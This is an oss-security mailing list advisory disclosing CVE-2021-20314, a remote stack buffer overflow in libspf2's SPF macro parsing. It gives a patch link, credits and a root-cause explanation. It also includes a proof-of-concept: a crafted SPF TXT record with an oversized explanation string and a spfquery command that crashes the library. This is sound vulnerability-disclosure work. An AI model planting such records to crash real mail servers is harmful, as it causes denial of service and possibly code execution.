Date: Wed, 11 Aug 2021 16:41:16 +0200 From: "Philipp Jeitner (SIT)" <philipp.jeitner@....fraunhofer.de> To: <oss-security@...ts.openwall.com> Subject: CVE-2021-20314: Remote stack buffer overflow in libspf2 #### Description Stack buffer overflow in libspf2 versions below 1.2.11 when processing certain SPF macros can lead to Denial of service and potentially code execution via malicious crafted SPF explanation messages. CVE-2021-20314 has been assigned to this issue. #### Attack type Remote #### Impact (x) Code Execution (x) Denial of Service #### Attack vector(s): Attackers need to cause a mail server to process a malicious SPF record, ie. via sending an email from an attacker-controlled domain. Thus, any mail server accepting mails and processing them via libspf2 is vulnerable. #### Patch The issue has been fixed in github commit c37b7c1: https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef An updated version of libspf2 (1.2.11) which also fixes other security related issues is available from github (https://github.com/shevek/libspf2). The libspf2 website (https://www.libspf2.org/download.html) and latest release there is NOT UPDATED YET. #### Discoverer(s)/Credits Philipp Jeitner and Haya Shulman, Fraunhofer SIT philipp.jeitner@....fraunhofer.de haya.shulman@....fraunhofer.de #### Reference(s) - libspf2: https://www.libspf2.org/, https://github.com/shevek/libspf2 - patch: https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef - Injection Attacks Reloaded: Tunneling Malicious Payloads over DNS https://www.usenix.org/conference/usenixsecurity21/presentation/jeitner #### Details and information to reproduce the vulnerability To reproduce, set the SPF record of a domain you control like listed below: example.com. 300 IN TXT "v=spf1 exp=exp.example.com" exp=exp.example.com. 300 IN TXT "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Then trigger SPF processing in libspf2, ie. via the command line `spfquery` tool. # spfquery --sender someone@...mple.com -ip 18.104.22.168 *** stack smashing detected ***: terminated Aborted (core dumped) The record causes a 4-byte stack buffer overflow of local variable `buf` in `SPF_record_compile_macro`, which is responsible for parsing the potential macros included in the SPF explanation message. The overflow is caused by an incorrect buffer length adjustment in the `SPF_INIT_STRING_LITERAL` macro which places a 4-byte header of type `SPF_data_str` into the buffer inside `buf` without decreasing the available size `ds_avail` by 4. Exploiting this vulnerability therefore allows the attacker to override up to 4 bytes on the stack of `SPF_record_compile_macro` directly after `buf`.
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.